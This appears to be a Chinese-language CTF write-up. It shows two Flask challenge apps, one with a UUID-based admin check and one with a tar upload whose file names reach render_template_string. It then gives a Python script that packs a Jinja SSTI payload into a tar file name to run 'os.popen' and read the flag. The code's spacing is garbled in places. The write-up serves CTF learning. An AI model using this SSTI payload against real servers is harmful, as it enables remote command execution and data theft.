#!/usr/bin/env python3 from flask import Flask, request, redirect, render_template, render_template_string import subprocess import urllib import uuid global leet
app = Flask(__name__) flag = open('/flag.txt').read() leet=uuid.UUID('13371337-1337-1337-1337-133713371337')
@app.route('/',methods=['GET','POST']) defmain(): global username if request.method == 'GET': return render_template('index.html') elif request.method == 'POST': username = request.values['username'] if username == 'admin123': return'Stop trying to act like you are the admin!' uid = uuid.uuid5(leet,username) # super secure! return redirect(f'/{uid}')
@app.route('/<uid>') defuser_page(uid): if uid != str(uuid.uuid5(leet,'admin123')): returnf'Welcome! No flag for you :(' else: return flag
if __name__ == '__main__': app.run(host='0.0.0.0', port=1337)
#!/usr/bin/env python3 from flask import Flask, request, redirect, render_template, render_template_string import tarfile from hashlib import sha256 import os app = Flask(__name__)
@app.route('/',methods=['GET','POST']) defmain(): global username if request.method == 'GET': return render_template('index.html') elif request.method == 'POST': file = request.files['file'] if file.filename[-4:] != '.tar': return render_template_string("<p> We only support tar files as of right now!</p>") name = sha256(os.urandom(16)).digest().hex() os.makedirs(f"./uploads/{name}", exist_ok=True) file.save(f"./uploads/{name}/{name}.tar") try: tar_file = tarfile.TarFile(f'./uploads/{name}/{name}.tar') tar_file.extractall(path=f'./uploads/{name}/') return render_template_string(f"<p>Tar file extracted! View <a href='/view/{name}'>here</a>") except: return render_template_string("<p>Failed to extract file!</p>")
@app.route('/view/<name>') defview(name): ifnotall([i in"abcdef1234567890"for i in name]): return render_template_string("<p>Error!</p>") #print(os.popen(f'ls ./uploads/{name}').read()) #print(name) files = os.listdir(f"./uploads/{name}") out = '<h1>Files</h1><br>' files.remove(f'{name}.tar') # Remove the tar file from the list for i in files: out += f'<a href="/read/{name}/{i}">{i}</a>' # except: return render_template_string(out)
@app.route('/read/<name>/<file>') defread(name,file): if (notall([i in"abcdef1234567890"for i in name])): return render_template_string("<p>Error!</p>") if ((".."in name) or (".."in file)) or (("/"in file) or"/"in name): return render_template_string("<p>Error!</p>") f = open(f'./uploads/{name}/{file}') data = f.read() f.close() return data
if __name__ == '__main__': app.run(host='0.0.0.0', port=1337)
这里存在明显的ssti注入
name是随机数生成 但是file可控
直接打ssti就行
1 2 3 4 5 6 7 8 9 10 11 12 13 14
import tarfile import os
defmain(): file_name = '''{%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag_15b726a24e04cc6413cb15b9d91e548948dac073b85c33f82495b10e9efe2c6e.txt').read()}}{%endif%}{%endfor%}''' tar_name = "1.tar" withopen(file_name, 'w') as file: pass with tarfile.open(tar_name, "w") as tar: tar.add(file_name, arcname=os.path.basename(file_name))